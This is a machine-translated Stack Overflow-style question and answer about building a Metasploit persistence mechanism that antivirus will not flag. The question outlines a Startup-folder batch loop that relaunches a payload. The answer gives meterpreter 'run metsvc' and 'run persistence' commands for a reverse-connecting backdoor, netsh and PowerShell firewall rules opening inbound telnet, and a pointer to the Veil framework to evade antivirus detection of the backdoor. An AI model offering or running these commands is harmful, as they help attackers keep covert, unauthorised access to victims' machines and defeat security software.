【问题标题】:Simple Persistence Script - Metasploit简单的持久性脚本 - Metasploit
【发布时间】:2015-06-09 13:51:59
【问题描述】:
我正在尝试为 Metasploit 设计一个简单的持久性脚本,考虑到他们拥有的那个被防病毒标记。我遇到了一些关于代码应该是什么样子的麻烦。这是我的计划:
1.启动文件夹中的批处理文件,带有循环功能
2. 所述批处理文件执行任务列表命令并在正在运行的进程中搜索文件名
3. 如果它发现进程正在运行,它什么也不做
4.如果它没有看到进程正在运行,它只是再次启动它
这是一个非常简单的设计,但我在编写代码时遇到了麻烦。我的问题是:我如何将这个想法写成命令?这个想法是 if 语句如何影响 tasklist 命令。所以我需要对tasklist命令进行过滤,根据名字来查看进程是否在运行,然后我需要将tasklist命令的输出设置为变量,这样我就可以编写if语句了:
如果 %process%==Client.exe(转到是)
【问题讨论】:
标签:
persistence
metasploit
【解决方案1】:
Metasploit 附带默认的辅助模块。在您的场景中,您可以使用执行
run metsvc 超过meterprerter。或
run persistence -U -i <interactive seconds > -p portnumber -r victimip
您也可以使用netsh 创建规则
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
使用 Powershell
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
如果有任何 AV 检测到您的后门,请使用 veil framework